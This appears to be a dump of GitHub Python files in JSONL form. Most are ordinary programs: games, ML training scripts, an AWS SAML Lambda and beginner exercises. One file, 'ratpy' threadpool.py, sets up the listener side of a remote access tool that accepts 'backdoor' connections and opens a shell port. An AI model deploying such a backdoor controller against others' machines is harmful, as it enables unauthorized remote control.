+{"seq_id":"39272812309","text":"#This program gives information regarding Joe's purchase of stock\r\n\r\n#Store the given information\r\nshares_purchased = 1000\r\ndollars_per_share = 32.87\r\ncommission = 0.02\r\nshares_sold = 1000\r\ndollars_per_share_sold = 33.92\r\n\r\n#The amount of money Joe paid for the stock\r\npaid_for_stock = shares_purchased * dollars_per_share\r\nprint(f'Joe paid ${paid_for_stock} for his shares')\r\n#The amount of commission Joe paid his broker when he bought the stock\r\ncommision_for_stock = commission * paid_for_stock\r\nprint(f'Joe paid a commission of ${commision_for_stock}')\r\n#The amount Joe sold the stock for\r\namount_sold_for = shares_sold * dollars_per_share_sold\r\nprint(f'Joe sold his stock for ${amount_sold_for},')\r\n#The amount of commission Joe paid his broker when he sold the stock\r\ncommission_paid_2 = commission * amount_sold_for\r\n#Display the amount of money that Joe had left when he sold the stock and paid his broker (both times). If this amount is positive, then Joe made a profit. 
If the amount is negative, then Joe lost money.\nmoney_left = amount_sold_for - commission_paid_2\nprint(f'Joe has ${money_left} left')","repo_name":"mayawagle/Programming","sub_path":"Starting out with python/ch 2/exercises/stock_transaction_program.py","file_name":"stock_transaction_program.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"14552102274","text":"'''\nFunction:\n\tGreedy Snake mini game\nAuthor:\n\tCharles\nWeChat Official Account:\n\tCharles的皮卡丘\n'''\nimport sys\nimport cfg\nimport pygame\nfrom modules.food import *\nfrom modules.snake import *\nfrom modules.utils import *\nfrom modules.endInterface import *\n\n\n'''main function'''\ndef main(cfg):\n\t# initialize the game\n\tpygame.init()\n\tscreen = pygame.display.set_mode(cfg.SCREENSIZE)\n\tpygame.display.set_caption('Greedy Snake —— WeChat Official Account: Charles的皮卡丘')\n\tclock = pygame.time.Clock()\n\t# play background music\n\tpygame.mixer.music.load(cfg.BGMPATH)\n\tpygame.mixer.music.play(-1)\n\t# main game loop\n\tsnake = Snake(cfg)\n\tapple = Apple(cfg, snake.coords)\n\tscore = 0\n\twhile True:\n\t\tscreen.fill(cfg.BLACK)\n\t\t# --key press detection\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key in [pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT]:\n\t\t\t\t\tsnake.setDirection({pygame.K_UP: 'up', pygame.K_DOWN: 'down', pygame.K_LEFT: 'left', pygame.K_RIGHT: 'right'}[event.key])\n\t\t# --update the snake and the food\n\t\tif snake.update(apple):\n\t\t\tapple = Apple(cfg, snake.coords)\n\t\t\tscore += 1\n\t\t# --check whether the game is over\n\t\tif snake.isgameover: break\n\t\t# --draw the necessary game elements\n\t\tdrawGameGrid(cfg, screen)\n\t\tsnake.draw(screen)\n\t\tapple.draw(screen)\n\t\tshowScore(cfg, score, screen)\n\t\t# --update the screen\n\t\tpygame.display.update()\n\t\tclock.tick(cfg.FPS)\n\treturn endInterface(screen, cfg)\n\n\n'''run'''\nif __name__ == '__main__':\n\twhile True:\n\t\tif not main(cfg):\n\t\t\tbreak","repo_name":"akkiteja/ALL-GAMES","sub_path":"Game24/Game24.py","file_name":"Game24.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
+{"seq_id":"37327848250","text":"import numpy as np\nfrom numpy import newaxis as na\n\n\ndef lrp_linear(hin, w, b, hout, Rout, bias_nb_units, eps, bias_factor, debug=False):\n    \"\"\"\n    LRP for a linear layer with input dim D and output dim M.\n    Args:\n    - hin: forward pass input, of shape (D,)\n    - w: connection weights, of shape (D, M)\n    - b: biases, of shape (M,)\n    - hout: forward pass output, of shape (M,) (unequal to np.dot(w.T,hin)+b if more than one incoming layer!)\n    - Rout: relevance at layer output, of shape (M,)\n    - bias_nb_units: number of lower-layer units onto which the bias/stabilizer contribution is redistributed\n    - eps: stabilizer (small positive number)\n    - bias_factor: for global relevance conservation set to 1.0, otherwise 0.0 to ignore bias redistribution\n    Returns:\n    - Rin: relevance at layer input, of shape (D,)\n    \"\"\"\n    sign_out = np.where(hout[na,:]>=0, 1., -1.) # shape (1, M)\n    \n    #numer = (w * hin[:,na]) + ( (bias_factor*b[na,:]*1. + eps*sign_out*1.) * 1./bias_nb_units ) # shape (D, M)\n    numer = (w * hin[:,na]) + ( (bias_factor*b[na,:]*1.) * 1./bias_nb_units ) # shape (D, M)\n    \n    denom = hout[na,:] + (eps*sign_out*1.) 
# shape (1, M)\n \n message = (numer/denom) * Rout[na,:] # shape (D, M)\n \n Rin = message.sum(axis=1) # shape (D,)\n \n # Note: local layer relevance conservation if bias_factor==1.0 and bias_nb_units==D\n # global network relevance conservation if bias_factor==1.0 (can be used for sanity check)\n if debug:\n print(\"local diff: \", Rout.sum() - Rin.sum())\n \n return Rin\n","repo_name":"NPoe/neural-nlp-explanation-experiment","sub_path":"HybridDocuments/ThirdParty/LRP_and_DeepLIFT/code/LRP_linear_layer.py","file_name":"LRP_linear_layer.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"12954145434","text":"import boto3\nimport json\nimport logging\nimport requests\n\nfrom crhelper import CfnResource\n\nlogger = logging.getLogger(__name__)\nhelper = CfnResource(\n json_logging=False, log_level='DEBUG', boto_level='CRITICAL')\n\ntry:\n client = boto3.client(\"iam\")\nexcept Exception as e:\n helper.init_failure(e)\n\ndef get_parameters(event):\n name = event['ResourceProperties']['Name']\n url = event['ResourceProperties']['URL']\n if 'Metadata' in event['ResourceProperties']:\n metadata = event['ResourceProperties']['Metadata']\n else:\n metadata = get_metadata(url)\n\n return name, metadata, url\n\ndef get_metadata(url):\n response = requests.get(url)\n metadata = response.text\n logger.info(\"metadata = \" + metadata)\n if response.status_code != requests.codes.ok:\n raise response.raise_for_status()\n return metadata\n\ndef create_provider(name, metadata, url):\n response = client.create_saml_provider(\n Name=name,\n SAMLMetadataDocument=metadata\n )\n physical_resource_id = response['SAMLProviderArn']\n logger.info(\"created SAML provider \" + physical_resource_id)\n data = { \"Name\": name }\n helper.Data = data\n return physical_resource_id\n\n@helper.create\ndef create(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=False))\n return create_provider(*get_parameters(event))\n\n@helper.delete\ndef delete(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=False))\n physical_resource_id = event['PhysicalResourceId']\n logger.info(\"deleting SAML provider \" + physical_resource_id)\n client.delete_saml_provider(\n SAMLProviderArn=physical_resource_id\n )\n\n@helper.update\ndef update(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=False))\n physical_resource_id = event['PhysicalResourceId']\n new_properties = event['ResourceProperties']\n\n if 'Metadata' in new_properties:\n metadata = new_properties['Metadata']\n else:\n metadata = get_metadata(new_properties['URL'])\n\n response = client.update_saml_provider(\n SAMLProviderArn=physical_resource_id,\n SAMLMetadataDocument=metadata\n )\n physical_resource_id = response['SAMLProviderArn']\n logger.info(\"updated SAML provider \" + physical_resource_id)\n data = { \"Name\": new_properties['Name'] }\n helper.Data = data\n return physical_resource_id\n\ndef lambda_handler(event, context):\n helper(event, context)\n","repo_name":"Sage-Bionetworks-IT/cfn-cr-saml-provider","sub_path":"saml_provider/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70413997286","text":"\"\"\"\nScript to load a dataset, train a series of ML models, and save them to bentoml\n\"\"\"\nimport bentoml\nimport os\nimport pickle\nimport 
pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nfrom sklearn.tree import DecisionTreeClassifier\nfrom typing import Tuple\n\n\ndef load_dataset(data_path: str, col_names: list[str]) -> Tuple[pd.DataFrame, pd.DataFrame]:\n    \"\"\"Function to load a dataset from a file\n\n    :param data_path: File path to the data to be loaded\n    :type data_path: str\n    :param col_names: A list of the desired column names\n    :type col_names: list[str]\n    :return: The feature DataFrame and a DataFrame of encoded class labels\n    :rtype: Tuple[pd.DataFrame, pd.DataFrame]\n    \"\"\"\n    # Load the iris dataset\n    temp_df = pd.read_csv(data_path, header=None)\n    # Give each column a meaningful name\n    temp_df.columns = col_names\n    # Create a label encoder\n    label_encoder = LabelEncoder()\n    # Assign labels to the iris species class\n    temp_labels = pd.DataFrame()\n    temp_labels[\"Label\"] = label_encoder.fit_transform(temp_df[\"Class\"])\n    # Drop the class from the main data\n    temp_df = temp_df.drop(columns=[\"Class\"])\n\n    return temp_df, temp_labels\n\n\ndef fit_scaler(df: pd.DataFrame) -> StandardScaler:\n    \"\"\"Function to fit a standard scaler to the Iris dataset\n\n    :param df: DataFrame of iris data, including: Sepal Length, Sepal Width, Petal Length, and Petal Width\n    :type df: pd.DataFrame\n    :return: Returns a fitted standard scaler\n    :rtype: StandardScaler\n    \"\"\"\n    scaler = StandardScaler()\n    scaler.fit(df)\n\n    return scaler\n\n\ndef scale_data(df: pd.DataFrame, scaler: StandardScaler) -> pd.DataFrame:\n    \"\"\"Function to scale data using a fitted StandardScaler\n\n    :param df: DataFrame of data to be scaled\n    :type df: pd.DataFrame\n    :param scaler: A fitted scaler object\n    :type scaler: StandardScaler\n    :return: Returns a dataframe of scaled data\n    :rtype: pd.DataFrame\n    \"\"\"\n    return pd.DataFrame(scaler.transform(df), columns=df.columns)\n\n\ndef split_dataset(df: pd.DataFrame, labels: pd.DataFrame) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n    \"\"\"Function to split a dataset 70/30 train/test\n\n    :param df: Dataframe containing data to be split\n    :type df: pd.DataFrame\n    :param labels: DataFrame containing iris labels\n    :type labels: pd.DataFrame\n    :return: Returns a tuple of train/test data and labels\n    :rtype: Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]\n    \"\"\" \n\n    features = df.values[:, 0:4].reshape(len(df), 4)\n    labels = labels.values[:, 0]\n\n    tr_X, ts_X, tr_y, ts_y = train_test_split(features, labels, test_size=0.3, random_state=42)\n    tr_y = tr_y.astype('int')\n    ts_y = ts_y.astype('int')\n\n    return tr_X, ts_X, tr_y, ts_y\n\n\nif __name__ == \"__main__\":\n    print(\"Hello world\")\n\n    # Load the iris dataset\n    iris_df, iris_labels = load_dataset(f\"{os.getcwd()}/data/iris.data\", [\"Sepal Length\", \"Sepal Width\",\n                                                                         \"Petal Length\", \"Petal Width\", \"Class\"])\n\n    # Create, fit, and save a standard scaler\n    iris_scaler = fit_scaler(iris_df)\n    bentoml.sklearn.save_model(\"scaler\", iris_scaler)\n\n    # Scale the dataset\n    scaled_df = scale_data(iris_df, iris_scaler)\n\n    # Split the data into train and test\n    train_features, test_features, train_labels, test_labels = split_dataset(iris_df, iris_labels)\n\n    # Train and save a range of basic ML models\n    lr = 
LogisticRegression(random_state=0).fit(train_features, train_labels)\n    bentoml.sklearn.save_model(\"logistic_regression\", lr)\n\n    knn = KNeighborsClassifier(n_neighbors=3).fit(train_features, train_labels)\n    bentoml.sklearn.save_model(\"knn\", knn)\n\n    gnb = GaussianNB().fit(train_features, train_labels)\n    bentoml.sklearn.save_model(\"gaussian_naive_bayes\", gnb)\n\n    dt = DecisionTreeClassifier().fit(train_features, train_labels)\n    bentoml.sklearn.save_model(\"decision_tree\", dt)\n\n    rf = RandomForestClassifier(max_depth=2, random_state=0).fit(train_features, train_labels)\n    bentoml.sklearn.save_model(\"random_forest\", rf)\n","repo_name":"ABillington96/Bento-Kitchen","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"1844980917","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 10 11:46:15 2018\r\n\r\n@author: User\r\n\"\"\"\r\nimport pyautogui \r\n\r\npyautogui.FAILSAFE = True\r\npyautogui.PAUSE = 1 \r\n\r\n# screen size\r\nwidth,height = pyautogui.size()\r\n# current position of the mouse\r\nposition = pyautogui.position()\r\n# move the mouse to\r\npyautogui.moveTo(300,400)\r\n\r\npyautogui.moveTo(250,110)\r\npyautogui.click(x=250, y=110, clicks=1, interval=0, button='left')\r\npyautogui.click(x=350, y=110, clicks=1, interval=0, button='right')\r\n\r\npyautogui.click(x=250, y=690, clicks=1, interval=0, button='left')\r\n\r\nkeys = \"hhh\"\r\npyautogui.press(keys, presses=1, interval=0.0, pause=None, _pause=True)\r\n\r\n\r\n\r\nfrom pynput.keyboard import Key, Controller\r\n\r\n\r\n","repo_name":"mis-drug-dealer/anythings_py","sub_path":"automation.py","file_name":"automation.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"6597573390","text":"import os\nimport sys\n\nimport lightgbm as lgb\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_validate, PredefinedSplit\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom utils import *\n\nsns.set_style('darkgrid')\n\nNAME = 'v4'\n\nprint('load datasets')\nfeats = ['basic', 'main_days_to_years', 'main_days_pairwise', 'main_money_pairwise']\ndfs = [pd.read_feather(WORKING / f'{f}_train.ftr') for f in feats]\nX_train = pd.concat(dfs, axis=1)\ndfs = [pd.read_feather(WORKING / f'{f}_test.ftr') for f in feats]\nX_test = pd.concat(dfs, axis=1)\n\ny_train = pd.read_feather(WORKING / 'y_train.ftr').TARGET\n\nprint(X_train.shape)\nprint(X_test.shape)\n\ncv_id = pd.read_feather(INPUT / 'cv_id.ftr').cv_id\ncv = PredefinedSplit(cv_id)\n\nlgb_params = {\n    'n_estimators': 1000,\n    'learning_rate': 0.1,\n    'num_leaves': 31,\n    'colsample_bytree': 0.8,\n    'subsample': 0.9,\n    'reg_alpha': 0.1,\n    'reg_lambda': 0.1,\n    'min_split_gain': 0.01,\n    'min_child_weight': 2,\n    'random_state': 77\n}\n\nprint('5-fold CV')\nscore = cross_validate(lgb.LGBMClassifier(**lgb_params), X_train, y_train, cv=cv.split(X_train, y_train),\n                       scoring='roc_auc', n_jobs=4, verbose=4)\n\nvalid_score = score['test_score'].mean()\nprint('val:', valid_score)\n\nprint('train')\nmodel = lgb.LGBMClassifier(**lgb_params)\nmodel.fit(X_train, y_train)\n\nprint(f'val = {valid_score};\\nfeats = {feats};\\nlgb_params = {lgb_params}')\ngenerate_submit(model.predict_proba(X_test)[:, 1], 
f'{NAME}_{valid_score:.4f}')\n\nprint('output feature importances')\nfeat_df = pd.DataFrame({'importance': model.feature_importances_}, index=X_train.columns).sort_values('importance')\nfeat_df[-50:].plot.barh(figsize=(20, 15))\nplt.savefig(str(Path().home() / f'Dropbox/kaggle/{NAME}_feats.pdf'))\n","repo_name":"amaotone/home-credit-default-risk","sub_path":"lgbm/v4.py","file_name":"v4.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"30078752770","text":"import random\nimport numpy as np\nfrom typing import Tuple, Optional\n\nfrom logic.game_logic import GameLogic, SECOND_PLAYER_CODE, FIRST_PLAYER_CODE, EMPTY_CODE, EXIT_CODE, EXIT_SYMBOLS\nfrom logic.game_objects import Board\n\n\ndef free_position(column: np.array) -> int:\n \"\"\"\n find the first free position in column\n numeration from 1\n\n :param column: array slice\n :return:\n position index,\n -1 - if the whole column is free,\n 0 - if the column has no free place\n \"\"\"\n if np.all(column == 0): # if the whole column is free\n return -1\n return np.argmax(column > 0) # first empty position (numeration from 1) in column or 0\n\n\nclass Player:\n def __init__(self, name: str, color: str = \"white\"):\n self.name = name\n self.color = color\n\n def make_move(self, board: Board) -> Tuple[int, int]:\n pass\n\n\nclass Human(Player):\n def make_move(self, board) -> Tuple[int, int]:\n \"\"\"\n human player move, player chooses just column number\n\n :param board: game board\n :return: chosen position, (EXIT_CODE, EXIT_CODE) or (-1, -1) - wrong move\n \"\"\"\n try:\n input_str = input(\"Enter column number: \")\n column_number = int(input_str) - 1\n column = board.field[:, column_number] # get the column\n except (ValueError, IndexError) as e:\n if input_str.lower() in EXIT_SYMBOLS:\n return EXIT_CODE, EXIT_CODE\n print(e)\n return -1, -1 # wrong input - wrong move\n position = free_position(column)\n if position >= 0:\n row_number = position - 1\n else:\n row_number = board.height - 1 # the lower location\n\n return row_number, column_number\n\n\nclass AI(Player):\n def __init__(self, game_logic: GameLogic):\n \"\"\"\n AI name = \"AI\",\n AI color = \"red\"\n\n :param game_logic: AI needs game logic to check win\n \"\"\"\n name = \"AI\"\n color = \"red\"\n super().__init__(name, color)\n self.game_logic = game_logic\n\n def make_move(self, board: Board) -> Tuple[int, int]:\n \"\"\"\n AI try to make win move,\n then try to prevent the enemy win,\n and then make move\n\n :param board: game board\n :return: location for the new piece\n \"\"\"\n input(\"press enter...\") # for delay\n return (\n self.winning_move(board) or\n self.blocking_move(board) or\n self.random_move(board)\n )\n\n def winning_move(self, board: Board) -> Optional[Tuple[int, int]]:\n \"\"\"\n try to do winning move\n\n :param board: game board\n :return: winning position if exist\n \"\"\"\n return self._common_move(board, code=SECOND_PLAYER_CODE)\n\n def blocking_move(self, board: Board) -> Optional[Tuple[int, int]]:\n \"\"\"\n try to do blocking move\n\n :param board: game board\n :return: blocking enemy winning position if exist\n \"\"\"\n return self._common_move(board, code=FIRST_PLAYER_CODE)\n\n def random_move(self, board: Board) -> Tuple[int, int]:\n \"\"\"\n \n\n :param board: game board\n :return: position by AI logic\n \"\"\"\n row_number = -1\n while row_number < 0:\n column_number = random.randint(0, board.length - 1)\n column = board.field[:, 
column_number] # get the column\n position = free_position(column)\n if position >= 0:\n row_number = position - 1\n else:\n row_number = board.height - 1 # the lower location\n\n return row_number, column_number\n\n def _common_move(self, board: Board, code: int = SECOND_PLAYER_CODE) -> Optional[Tuple[int, int]]:\n \"\"\"\n difference between winning_move and blocking_move is just\n which player code is a winner\n\n :param board: game board\n :param code: AI/not_AI _CODE\n :return: winning position\n \"\"\"\n for column_number, column in enumerate(board.field.T): # iterate by columns\n position = free_position(column)\n if position >= 0:\n row_number = position - 1\n else:\n row_number = board.height - 1 # the lower location\n if row_number < 0:\n continue\n\n board.place_piece(code, (row_number, column_number))\n if self.game_logic.win_situation(board):\n # we shouldn't place the piece, just return location\n board.place_piece(EMPTY_CODE, (row_number, column_number))\n return row_number, column_number\n board.place_piece(EMPTY_CODE, (row_number, column_number))\n return None\n","repo_name":"vvvin333/Connect-Four-Game","sub_path":"src/players/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19589466295","text":"import cv2\r\nfacePath = \"haarcascade_frontalface_default.xml\"\r\nfaceCascade = cv2.CascadeClassifier(facePath)\r\npath = \"haarcascade_eye.xml\"\r\neye_cascade = cv2.CascadeClassifier(path)\r\ncap = cv2.VideoCapture(1)\r\nwhile True:\r\n ret, frame = cap.read() # Capture frame-by-frame\r\n img = frame\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(gray,scaleFactor= 1.05,minNeighbors=8,minSize=(55, 55),flags=cv2.CASCADE_SCALE_IMAGE)\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n roi_gray = gray[y:y+h, x:x+w]\r\n roi_color = img[y:y+h, x:x+w]\r\n eyes = eye_cascade.detectMultiScale(roi_gray)\r\n for (ex,ey,ew,eh) in eyes:\r\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\r\n cv2.imshow('Smile Detector', frame)\r\n c = cv2.waitKey(7) % 0x100\r\n if c == 27:\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"Robocrats/ComputerVision-with-OpenCV-Python3","sub_path":"Ch6/Ch06_14.py","file_name":"Ch06_14.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15336815625","text":"#!/usr/bin/env python3\n# _*_ encoding=utf-8 _*_\n\nimport json\n\n\ndef readData():\n with open('./data.json', 'r') as f:\n json_str = f.read()\n d = json.loads(json_str)\n return d\n\nd = readData()\nprint(d['seller'])\n","repo_name":"zenyuca/study-python3","sub_path":"IO/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14369039785","text":"#!/usr/bin/python3\n\"\"\"Prints each character in a string\"\"\"\nname = input(\"Name: \")\n\n\n\nfor c in name:\n if (c.lower() == \"f\"):\n print(c)\n break\nelse:\n print(\"You didn't find what you were looking for\")","repo_name":"ehoneahobed/python_pld","sub_path":"print_chars.py","file_name":"print_chars.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"20500574587","text":"import threading\nfrom sys import exit\nfrom time import sleep\nfrom queue import Queue\nimport getpass\n\nfrom utils.connection import estabilish_connection\nfrom interface.menu import main_menu\n\n\nn_threads = 2\njobs = [1, 2]\nqueue = Queue()\n\naddrs = []\ncons = []\n\nip_addr = \"192.168.1.231\"\nport = 4444\nshell_port = 4666\n\n\ndef create_threads():\n for _ in range(n_threads):\n objThread = threading.Thread(target=work)\n objThread.daemon = True\n objThread.start()\n queue.join()\n\n\ndef create_jobs():\n for thread_id in jobs:\n queue.put(thread_id)\n queue.join()\n\n\ndef work():\n global ip_addr, port, shell_port\n while True:\n val = queue.get()\n if val == 1:\n conn, addr = estabilish_connection(ip_addr, port)\n cons.append(conn)\n addrs.append(addr)\n elif val == 2:\n while True:\n sleep(0.2)\n if len(addrs) > 0:\n main_menu(cons, addrs, ip_addr, port, shell_port, status=1)\n break\n queue.task_done()\n exit(0)\n\n\ndef setup():\n global KEY, ip_addr, port, shell_port\n key = getpass.getpass(\"Encryption password: \")\n if len(key) < 1:\n print(\"Password must be set\")\n exit(0)\n KEY = bytes(key, 'utf-8')\n ip_addr = input(\"Enter inet interface [192.168.1.231]: \")\n if ip_addr == \"\":\n ip_addr = \"192.168.1.231\"\n port = input(\"Enter backdoor connection port [4444]: \")\n if port == \"\" or int(port) == 4444:\n port = 4444\n else:\n try:\n port = int(port)\n except:\n print(\"Invalid port type, must be integer\")\n exit(0)\n shell_port = input(\"Enter shell port [4666]: \")\n if shell_port == \"\" or int(shell_port) == 4666:\n shell_port = 4666\n else:\n try:\n shell_port = int(shell_port)\n except:\n print(\"Invalid port type, must be integer\")\n exit(0)\n\n\ndef threadpool_run():\n setup()\n create_threads()\n create_jobs()\n","repo_name":"rodfer0x80/ratpy","sub_path":"src/master/threadpool/threadpool.py","file_name":"threadpool.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26960504682","text":"import cv2\nimport numpy as np\nfrom Fragment import Fragment\n\nclass FragmentProcessor(object):\n \"\"\" Fragment Processor partitions and consolidates processed fragments \"\"\"\n\n @staticmethod\n def partition(frame):\n \"\"\" Partition Frame into processed fragments \n \n Args:\n frame (np.ndarry): Frame to partition.\n \n Returns: \n A list of Fragments derived from Frame.\n \"\"\"\n height, width = frame.shape[:2]\n partitionSize = height//4\n fragments = []\n\n for i in range(4):\n startPartition = i * partitionSize\n # Extract and color-process fragment\n fragment = Fragment(frame[startPartition:(startPartition + partitionSize), 0:width])\n\n # Set center points to be relative to full Frame\n fragment.setRelativeContourCtrX(0)\n fragment.setRelativeImageCtrX(0)\n fragment.setRelativeContourCtrY(startPartition)\n fragment.setRelativeImageCtrY(startPartition)\n\n fragments.append(fragment)\n\n return fragments\n\n @staticmethod\n def consolidate(fragments):\n \"\"\" Consolidate partitioned Fragments.\n \n Args:\n fragments (list[Fragment]): Fragments to consolidate.\n \n Returns: \n A 2D array of consolidated fragments.\n \"\"\"\n frame = fragments[0].processedFragment\n\n # Concatenate fragments into one Frame\n for i in range(1, len(fragments)):\n frame = np.concatenate((frame, fragments[i].processedFragment), axis=0)\n \n return 
frame\n","repo_name":"velin13/line-tracker","sub_path":"FragmentProcessor.py","file_name":"FragmentProcessor.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36922414046","text":"from JumpScale import j\n\nimport Models\nimport inspect\n\ntry:\n import mongoengine\nexcept:\n pass\n\n\nclass NameSpaceLoader():\n def __init__(self, modelsmodule):\n self._module = modelsmodule\n mongoengine.register_connection(self._module.DB, self._module.DB)\n self._getModels()\n\n def _getModels(self):\n self._models = list()\n self._modelspecs = dict()\n for name, mem in inspect.getmembers(self._module, inspect.isclass):\n if issubclass(mem, mongoengine.base.document.BaseDocument) and mongoengine.Document != inspect.getmro(mem)[0]:\n self._models.append(name)\n self._modelspecs[name] = mem\n self.__dict__[name] = mem\n\n def addModel(self, modelclass):\n self._models.append(modelclass._class_name)\n self._modelspecs[modelclass._class_name] = modelclass\n self.__dict__[modelclass._class_name] = modelclass\n\n def listModels(self):\n return self._models\n\n def connect2mongo(self, host='localhost', port=27017, db='jumpscale_system'):\n \"\"\"\n \"\"\"\n mongoengine.connect(db=db, alias=db, host=host, port=port)\n\n\nclass System(NameSpaceLoader):\n def __init__(self):\n self.__jslocation__ = \"j.data.models.system\"\n super(System, self).__init__(Models)\n","repo_name":"Cloudxtreme/jumpscale_core8","sub_path":"lib/JumpScale/data/models/BaseModelFactory.py","file_name":"BaseModelFactory.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4476793441","text":"def letterCombinations(digits: str):\n conv = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n\n def backtrack(combination, next_digits):\n if len(next_digits) == 0:\n ans.append(combination)\n else:\n for alpha in conv[next_digits[0]]:\n backtrack(combination + alpha, next_digits[1:])\n\n ans = []\n if digits:\n backtrack(\"\", digits)\n return ans\n\n\ndigits = \"245\"\nc = letterCombinations(digits)\nprint(c)\nprint(len(c))\n","repo_name":"24rochak/LeetCode","sub_path":"Letter Combinations of a Phone Number.py","file_name":"Letter Combinations of a Phone Number.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25936071976","text":"def f():\r\n for jol in range(6):\r\n for bagan in range(5):\r\n if(jol==0 and (bagan>=0 and bagan<5)) or\\\r\n (jol==1 and bagan==0) or\\\r\n (jol==2 and bagan==0)or\\\r\n (jol==3 and (bagan>=0 and bagan<5)) or\\\r\n (jol==4 and bagan==0) or\\\r\n (jol==5 and bagan==0):\r\n print('F',end=' ')\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\ndef I():\r\n for row in range(7):\r\n for column in range(3):\r\n if column == 1 or row == 0 or row == 6:\r\n print(\"I\", end=\" \")\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\n\r\ndef N():\r\n for row in range(7):\r\n for column in range(7):\r\n if row == column or (column == 0 and row != 0) \\\r\n or column == 6 and row != 6:\r\n print(\"N\", end=\" \")\r\n else:\r\n print(\" \", end=\" \")\r\n print()\r\ndef i():\r\n for j in range(6):\r\n for b in range(5):\r\n if(j==0 and (b>=0 and b<5)) or\\\r\n (j==1 and 
b==2) or\\\r\n              (j==2 and b==2) or\\\r\n              (j==3 and b==2) or\\\r\n              (j==4 and b==2) or\\\r\n              (j==5 and (b>=0 and b<5)):\r\n                print('I',end=' ')\r\n            else:\r\n                print(\" \", end=\" \")\r\n        print()\r\ndef one():\r\n    for row in range(7):\r\n        for column in range(3):\r\n            if ((row >= 0 and row <= 2) and row + column == 2) \\\r\n                    or column == 2 and row != 0:\r\n                print(\"1\", end=\" \")\r\n            else:\r\n                print(\" \", end=\" \")\r\n        print()\r\nprint(\"I:\")\r\ni()\r\nN()\r\nprint(\"F:\")\r\nf()\r\nprint(\"1:\")\r\none()\r\nprint('')\r\none()\r\n","repo_name":"kuralovsa/Python","sub_path":"F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
